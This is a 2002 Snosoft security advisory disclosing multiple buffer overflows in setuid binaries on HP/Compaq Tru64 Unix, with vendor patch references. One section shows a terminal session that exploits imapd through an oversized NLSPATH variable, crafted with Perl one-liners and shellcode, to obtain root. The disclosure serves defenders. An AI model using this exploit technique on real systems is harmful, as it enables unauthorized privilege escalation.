TRU64 formal disclosure from Snosoft.

[KF <dotslash () snosoft com>]

======================================================================
Strategic Reconnaissance Team Security Advisory(SRT2002-09)
Topic: Compaq Tru64 Unix Mulitple Buffer Overflows
Vendor: HP/Compaq
Release Date: 09/04/2002
Author: stripey () snosoft com
Primary Research by: stripey () snosoft com
======================================================================

.: Description

The Tru64 operating system produced by HP/Compaq contains multiple
buffer overflows in multiple system libraries and binaries. Tru64
is now shipped with its non-exec stack implementation enabled by
default. This measure is intended to mitigate the risk presented
by buffer overflow conditions in setuid binaries - However, it has
been proven to be ineffective in preventing an attacker gaining
increased priviliges through traditional avenues of exploitation.

Affected binaries include:

        /usr/dt/bin/dtprintinfo
        /usr/dt/bin/dtsession
        /usr/dt/bin/dtaction
        /usr/dt/bin/dtterm
        /usr/bin/X11/dxsysinfo
        /usr/bin/X11/dxconsole
        /usr/bin/X11/dxpause
        /usr/bin/X11/dxterm
        /usr/tcb/bin/dxchpwd
        /usr/tcb/bin/edauth
        /usr/sbin/imapd
        /usr/bin/mh/msgchk
        /usr/bin/mh/inc
        /usr/bin/deliver
        /usr/bin/rdist
        /usr/bin/uucp
        /usr/bin/uux
        /usr/bin/su

Here is a quick look at how one of these issues can be exploited.
It should be fairly self explanatory.

% uname -a
OSF1 alpha.snosoft.com V5.1 732 alpha
% id
uid=208(stripey) gid=15(users)
% ls -la /usr/sbin/imapd
-rws--x--x   1 root     bin       789216 Aug 24  2000 /usr/sbin/imapd
% perl -e'$ENV{"NLSPATH"}=("A"x1024)."\x01\x02\x03\x04\x05";exec("/usr/sbin/imapd")'
Segmentation fault
% su 
Password:
# cp /usr/sbin/imapd test
# chmod a+r test
# exit
% perl -e'$ENV{"NLSPATH"}=("A"x1024)."\x01\x02\x03\x04\x05";exec("dbx","./test")'
(dbx) r
signal Segmentation fault at 
warning: PC value 0x504030200 not valid, trying RA
warning: RA value 0x504030200 not valid, trying text start
warning: text start 0x120000000 not valid, trying data start
warning: Using data start as a text address -- traceback will not work
> [., 0x140000000]      call_pal cflush
(dbx) 0x140014280/2X
0x0000000140014280:  0x4141414141414141 0x4141414141414141
(dbx) q
% perl -e'$ENV{"NLSPATH"}=(pack("l",0x47ff041f)x227).(`./sc`).pack("ll",0x40014280,0x1);exec("/usr/sbin/imapd")'
# id
uid=208(stripey) gid=15(users) euid=0(root)
# 

.: Impact

A local unpriviliged user can obtain increased permissions regardless of the non-exec stack flag.


.: Workaround

HP/Compaq has provided the following advisory and patches:

HP Advisory Ref: SSRT2257

http://wwss1pro.compaq.com/support/reference_library/viewdocument.asp?source=SRB0039W.xml&dt=11


.: Systems Affected

The following systems are known to be affected by some or all of these issues:

Tru64 5.1
Tru64 5.1A
DgUX 4.0


.: Proof of Concept

See http://www.snosoft.com/research in a few days. 


.: Vendor Status

Vendor informed, patches available.


.: References

HP Advisory Ref: SSRT2257


.: Credit

I can not stress enough the amount of dedication and hard work stripey has put into this
project. None of this would be possible without hours upon hours of diligent work from 
stripey () snosoft com


.: DISCLAIMER

Snosoft is in no way responsible for the use or abuse of the provided information.
The Compaq end user is responsible for his or her own local and remote security. 

That file you've been guarding, isn't.
-------------------------------------------------------------------
    ______________________________
   /   _____/\______   \__    ___/   | Secure Network Operations
   \_____  \  |       _/ |    |      | http://www.snosoft.com
   /        \ |    |   \ |    |      | recon () snosoft com
  /_______  / |____|_  / |____|      |
          \/         \/              | Project Cerebrum